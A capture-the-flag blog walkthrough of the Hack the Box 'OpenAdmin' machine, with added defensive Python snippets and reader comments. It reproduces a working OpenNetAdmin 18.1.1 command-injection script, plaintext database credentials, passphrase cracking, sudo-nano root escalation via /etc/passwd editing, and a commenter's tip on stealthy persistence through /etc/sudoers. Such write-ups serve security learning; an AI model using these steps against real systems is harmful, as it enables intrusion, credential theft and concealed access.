Hack the Box OpenAdmin Writeup

Hello, welcome to our Hack the Box write-up series. Today we are doing OpenAdmin, an easy Linux box.

HackTheBox’s first machine of 2020 seems to be a New Year’s gift from HTB to all their users to gain some points and ranks. This machine is very simple and straightforward.

Let us start.

NMAP Port Scan

As usual, let us add the machine’s IP to /etc/hosts as openadmin.htb for easier access. The next step is to run the nmap scan.

# root @ ns09 in ~/htb/openadmin [21:53:45] 
$ cat OpenAdmin_all_ports.nmap
# Nmap 7.80 scan initiated Sun Jan  5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for openadmin.htb (
Host is up (0.15s latency).
Not shown: 65503 closed ports, 30 filtered ports
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds
# root @ ns09 in ~/htb/openadmin [21:53:57] 

The nmap scan result shows that SSH on port 22 and TCP port 80, which normally runs an HTTP service, are open. A quick visit to port 80 shows the Apache2 default welcome page.

The box has not disclosed anything interesting so far apart from a webpage and SSH. We might need to find directories for better enumeration. To find directories we need to run Dirbuster. Let us set Dirbuster’s medium wordlist and start the scan.

Let Dirbuster run in the background, and let us start enumerating the subdirectories it showed in the initial results. I started to concentrate on two directories, ONA and Music. I opened http://openadmin.htb/ona, which took me to a webpage. This is the OpenNetAdmin control panel. OpenNetAdmin is an open-source IP Address Management (IPAM) system.

A warning on the homepage shows the version of the app is 18.1.1. A quick look on Google for vulnerabilities in version 18.1.1 shows that this version is vulnerable to RCE (remote code execution). So, at this point, we understood that this box is a victim of a recently discovered exploit.

ExploitDB listed two exploits: a Metasploit module and a bash script.

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux


while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

I just downloaded the script to my OpenAdmin working directory and ran it. The script gave me a shell as www-data immediately.
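From the defender's side, the request made by the script above is easy to recognise once POST bodies are available. The following is an added example, not part of the original post or of OpenNetAdmin: it flags xajax window_submit requests whose xajaxargs[] values carry shell syntax. It assumes bodies are already captured as (client, body) pairs, for instance from a WAF audit log, since default Apache access logs do not record them; the records below are constructed.

```python
import re
from urllib.parse import unquote_plus

# Characters that let a value break out into a shell command line.
SHELL_META = re.compile(r"[;|&`]|\$\(")

def parse_form(body):
    """Split a form-encoded body on '&' only; the script sends ';' unencoded."""
    pairs = []
    for part in body.split("&"):
        key, _, value = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs

def scan(records):
    """Return (client, value) for every xajaxargs[] value carrying shell syntax."""
    hits = []
    for client, body in records:
        pairs = parse_form(body)
        if ("xajax", "window_submit") not in pairs:
            continue
        hits += [(client, value) for key, value in pairs
                 if key == "xajaxargs[]" and SHELL_META.search(value)]
    return hits

# Constructed records: (client address, captured POST body).
RECORDS = [
    ("192.0.2.10", "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
                   "&xajaxargs[]=ip%3D%3E192.0.2.55&xajaxargs[]=ping"),
    ("198.51.100.7", "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips"
                     "&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";id;echo \"END\"&xajaxargs[]=ping"),
]

if __name__ == "__main__":
    for client, value in scan(RECORDS):
        print(f"ALERT {client}: shell syntax in xajaxargs[]: {value!r}")
```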

Since the user www-data is a low-privileged user, we will not be able to perform any major tasks. So, we need to escalate privileges to a more privileged user.

First, we need to find the users on the box. Let us use cat /etc/passwd to see if we can list the users.

$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

So we found a number of users on this box, but I’m not sure which one I should start with to escalate privileges. Let us start to enumerate the box, searching for hints.

After a while, I found a PHP file called “database_settings.inc.php” inside the directory /opt/ona/www/local/config/. The file has MySQL database credentials.

So far, we are not sure which user we could use these credentials with, so I listed the current local users of the box and found jimmy and joanna.

$ cat /opt/ona/www/local/config/database_settings.inc.php
$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',

Privilege Escalation

As SSH was running, I tried to SSH into the box as jimmy; luckily, it worked.

# root @ ns09 in ~/htb/openadmin [20:32:08] 
$ ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed Jan  8 17:33:45 UTC 2020
  System load:  0.38              Processes:             200
  Usage of /:   49.1% of 7.81GB   Users logged in:       2
  Memory usage: 34%               IP address for ens160:
  Swap usage:   0%
  => There is 1 zombie process.
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan  8 17:30:22 2020 from
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ cd home
-bash: cd: home: No such file or directory
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile

However, after a while, I realized this user doesn’t have a user flag, so let us proceed to enumerate more. The user’s www folder has a special folder called “internal”, which contained:

jimmy@openadmin:~$ cd /
jimmy@openadmin:/$ ls
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
jimmy@openadmin:/$ cd var
jimmy@openadmin:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www
jimmy@openadmin:/var$ cd www
jimmy@openadmin:/var/www$ ls
html  internal  ona
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The file “main.php” is our key to getting the private key of user Joanna and logging in as Joanna. To get the private key, we need to run a cURL command. Upon running cURL locally, we are blocked by a “404 Not Found” error from the server running on port 80. This made me realize that I need to find the port number which will give me access to the private key.

jimmy@openadmin:~$ curl
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>
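In main.php as listed above, header() only queues the redirect: PHP keeps executing, so the shell_exec output is still sent to a client that has no session and does not follow the redirect. The check below is an added example, not code from the original post; it is a regex heuristic (not a PHP parser) that flags Location redirects not immediately followed by exit or die, shown on the listed session check and on a hardened variant constructed here.

```python
import re
from pathlib import Path

# A Location redirect whose next statement is not exit/die: PHP keeps running
# the rest of the script and sends its output along with the redirect.
UNGUARDED = re.compile(
    r"""header\s*\(\s*["']Location:[^;]*;(?!\s*(?:exit|die)\b)""",
    re.IGNORECASE,
)

def unguarded_redirects(php_source):
    """Return 1-based line numbers of redirects that do not stop execution."""
    return [php_source.count("\n", 0, m.start()) + 1
            for m in UNGUARDED.finditer(php_source)]

def scan_tree(root):
    """Map each .php file under root to the lines of its unguarded redirects."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        lines = unguarded_redirects(path.read_text(errors="replace"))
        if lines:
            report[str(path)] = lines
    return report

# The session check and key read from main.php as listed above.
VULNERABLE = '''<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
'''

# Hardened variant (constructed here): stop right after queuing the redirect.
HARDENED = VULNERABLE.replace('"); }', '"); exit; }')

if __name__ == "__main__":
    print("vulnerable:", unguarded_redirects(VULNERABLE))
    print("hardened:  ", unguarded_redirects(HARDENED))
```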

To find open ports within the system, I ran the “netstat -tulpn” command. netstat listed a few open and listening ports:

jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 *                           -                   

I proceeded one by one; the second port, 52846, returned the private key of user Joanna.

jimmy@openadmin:/var/www/internal$ curl
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.
jimmy@openadmin:/var/www/internal$ curl
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

The SSH key is protected with a passphrase. I copied the key to my Kali machine and used John to crack the password using rockyou.txt. John cracked the password as “bloodninjas”. I immediately SSHed into the box as Joanna and got the user.txt.
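The Proc-Type and DEK-Info headers in the key above mark the traditional PEM encryption, which derives the AES key from the passphrase with a single MD5 pass, so a wordlist run against a weak passphrase is cheap. The classifier below is an added example, not part of the original post: it reports how a private key file is protected from its headers alone, so keys still in the legacy format can be found and re-encrypted. The OpenSSH sample is a constructed, header-only blob, not a usable key.

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\0"

def _string(buf, off):
    """Read one length-prefixed SSH string; return (value, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n], off + 4 + n

def classify_private_key(text):
    """Report how a private key file is protected, from its headers alone."""
    m = re.search(r"-----BEGIN ([A-Z0-9 ]*)PRIVATE KEY-----", text)
    if not m:
        return "not a private key"
    kind, rest = m.group(1).strip(), text[m.end():]
    if kind == "OPENSSH":
        blob = base64.b64decode("".join(rest.split("-----END", 1)[0].split()))
        if not blob.startswith(MAGIC):
            return "unknown"
        _cipher, off = _string(blob, len(MAGIC))
        kdf, _ = _string(blob, off)
        return "openssh, unencrypted" if kdf == b"none" else "openssh, kdf=" + kdf.decode()
    if kind == "ENCRYPTED":
        return "pkcs8, encrypted"
    if "Proc-Type: 4,ENCRYPTED" in rest[:200]:
        # Traditional PEM: the AES key is one MD5 pass over passphrase + salt.
        return "legacy pem, single-round MD5 KDF"
    return "unencrypted"

# Header lines as shown in the curl output above (key body not reproduced).
LEGACY = ("<pre>-----BEGIN RSA PRIVATE KEY-----\n"
          "Proc-Type: 4,ENCRYPTED\n"
          "DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D\n")

def sample_openssh(cipher, kdf):
    """Constructed header-only OpenSSH blob for the demo (not a usable key)."""
    blob = MAGIC + b"".join(struct.pack(">I", len(s)) + s for s in (cipher, kdf))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.b64encode(blob).decode()
            + "\n-----END OPENSSH PRIVATE KEY-----\n")

if __name__ == "__main__":
    for key in (LEGACY, sample_openssh(b"aes256-ctr", b"bcrypt")):
        print(classify_private_key(key))
```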

joanna@openadmin:~$ ls
joanna@openadmin:~$ cat user.txt

Getting Into the Root

There are two ways you can get root access on this machine using the privileges of our user Joanna. The first one is very simple: opening nano as root and reading the root.txt file. The second one is getting a shell as root by adding yourself as a root user by editing the /etc/passwd file, and then switching to your own user name.

Procedure 1: getting the root flag from nano:

The sudo -l command revealed that the user Joanna is able to run /bin/nano /opt/priv as root without a password. When you see that a user can run nano as root, it is the simplest thing to exploit. Just 3 commands and the box is yours.


joanna@openadmin:~$ sudo /bin/nano /opt/priv

If sudo asks you to confirm that you really want to run the file as root, obviously say “yes”.

Now that you have nano running as root, press CTRL+R (Read File) and enter /root/root.txt.

And CTRL+O (Write file) to read the root.txt.


Procedure 2: Adding yourself as a root user

Press CTRL+O to read the file /etc/passwd.


Now nano displays the contents of the /etc/passwd file. Create a user in your name, assign a password, and save using CTRL+O (Write file). Then exit nano and go back to the terminal.

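Both procedures rest on one sudoers rule that hands an interactive editor to a user as root. The audit below is an added example, not part of the original post: it walks sudoers text and reports every rule that grants an editor or pager, for which sudoedit on the specific file is the usual replacement. The sudoers fragment is constructed (the joanna line mirrors what the sudo -l result above describes), and the program list is a starting set, not a complete one.

```python
import os
import re

# Programs that can open arbitrary files or run commands from inside their UI.
INTERACTIVE = {"nano", "pico", "vi", "vim", "view", "emacs", "ed", "less", "more", "man"}

RULE = re.compile(r"^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
                  r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")

def audit_sudoers(text):
    """Return (who, runas, command, nopasswd) for rules granting an interactive program."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = False
        for spec in m.group("cmds").split(","):  # a tag carries over to later commands
            spec = spec.strip()
            t = TAG.match(spec)
            while t:
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                spec = spec[t.end():]
                t = TAG.match(spec)
            if spec and os.path.basename(spec.split()[0]) in INTERACTIVE:
                findings.append((m.group("who"), m.group("runas") or "root", spec, nopasswd))
    return findings

SAMPLE = """\
# constructed sudoers fragment
Defaults env_reset
root    ALL=(ALL:ALL) ALL
joanna  ALL=(ALL) NOPASSWD: /bin/nano /opt/priv
oncall  ALL=(root) /usr/sbin/service apache2 reload, NOPASSWD: /usr/bin/less /var/log/syslog
deploy  ALL=(root) NOPASSWD: sudoedit /opt/priv
"""

if __name__ == "__main__":
    for who, runas, cmd, nopasswd in audit_sudoers(SAMPLE):
        print(f"{who} may run '{cmd}' as {runas} (NOPASSWD={nopasswd})")
```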

That’s it. Thank you for reading.


Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

1 year ago

When I connect to SSH, it says the password is wrong! So how did you get the connection? 😀

1 year ago

When I connect for the first time with user [jimmy] and password [n1nj4W4rri0R!] using ssh on my Kali [ssh jimmy@openadmin.htb], it says permission denied, so I don’t know why that happens after I type the password, even though I reset the machine more than once!!

1 year ago


I just left you some respect on HTB. I appreciate you posting your methods. I try to find at least 2 or 3 write-ups to compare how I approached the problem compared to others. Interestingly enough, I always find something and learn something new. I just wanted to say thanks, and BTW you can use nano to run commands. You can do a cntrl-r and then a control-x … this approach was helpful for me when taking down openadmin.



Aric Wilisch
9 months ago

Was a good write up. I couldn’t get john to work but the rest was good. Only thing I did differently was instead of adding an account for me, I just modified /etc/sudoers to say

No additional users to raise suspicion, might preserve my presence in the system for a bit longer.
